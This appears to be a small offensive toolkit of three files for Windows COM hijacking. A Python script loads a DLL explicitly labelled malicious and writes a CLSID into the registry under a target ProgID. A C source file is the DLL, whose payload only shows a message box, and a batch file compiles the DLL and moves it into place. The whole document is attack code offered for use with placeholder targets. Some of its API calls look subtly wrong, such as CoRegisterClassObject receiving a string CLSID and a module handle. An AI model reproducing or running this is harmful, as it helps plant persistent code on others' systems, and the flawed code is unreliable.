[
    {
        "file_name": "com_hijack.py",
        "file_content": "import os\nimport ctypes\nimport winreg\n\ndef register_com_component(dll_path, clsid, progid):\n    \"\"\"\n    Registers a COM component with the specified CLSID and ProgID.\n\n    :param dll_path: Path to the DLL file.\n    :param clsid: CLSID of the COM component.\n    :param progid: ProgID of the COM component.\n    \"\"\"\n    try:\n        # Load the DLL\n        kernel32 = ctypes.WinDLL('kernel32')\n        hmodule = kernel32.LoadLibraryW(dll_path)\n\n        if not hmodule:\n            raise Exception(f\"Failed to load DLL: {dll_path}\")\n\n        # Register the COM component\n        ole32 = ctypes.WinDLL('ole32')\n        ole32.CoInitialize(None)\n        ole32.CoRegisterClassObject(\n            ctypes.c_wchar_p(clsid),\n            ctypes.c_void_p(hmodule),\n            ctypes.c_uint(1),\n            ctypes.c_void_p(0)\n        )\n        ole32.CoUninitialize()\n\n        # Write to the registry\n        with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, progid, 0, winreg.KEY_WRITE) as key:\n            winreg.SetValueEx(key, None, 0, winreg.REG_SZ, clsid)\n\n        print(f\"COM component registered successfully: {progid} -> {clsid}\")\n\n    except Exception as e:\n        print(f\"Error registering COM component: {e}\")\n\ndef main():\n    # Path to the malicious DLL\n    dll_path = r\"C:\\Path\\To\\Your\\MaliciousDLL.dll\"\n\n    # CLSID and ProgID of the target COM component\n    clsid = \"{YOUR-CLSID-HERE}\"\n    progid = \"Your.Target.ProgID\"\n\n    # Register the COM component\n    register_com_component(dll_path, clsid, progid)\n\nif __name__ == \"__main__\":\n    main()"
    },
    {
        "file_name": "malicious_dll.c",
        "file_content": "#include <windows.h>\n\nBOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {\n    switch (ul_reason_for_call) {\n        case DLL_PROCESS_ATTACH:\n            // Code to execute when the DLL is loaded\n            MessageBoxA(NULL, \"Malicious DLL Loaded!\", \"Info\", MB_OK);\n            break;\n        case DLL_THREAD_ATTACH:\n        case DLL_THREAD_DETACH:\n        case DLL_PROCESS_DETACH:\n            break;\n    }\n    return TRUE;\n}"
    },
    {
        "file_name": "build_dll.bat",
        "file_content": "@echo off\nREM Compile the malicious DLL\ncl /LD malicious_dll.c /Fe:MaliciousDLL.dll\nif %errorlevel% neq 0 (\n    echo Failed to compile malicious DLL.\n    exit /b %errorlevel%\n)\n\nREM Move the compiled DLL to the specified location\nmove /Y MaliciousDLL.dll \"C:\\Path\\To\\Your\\MaliciousDLL.dll\"\nif %errorlevel% neq 0 (\n    echo Failed to move malicious DLL.\n    exit /b %errorlevel%\n)\n\necho Malicious DLL compiled and moved successfully."
    }
]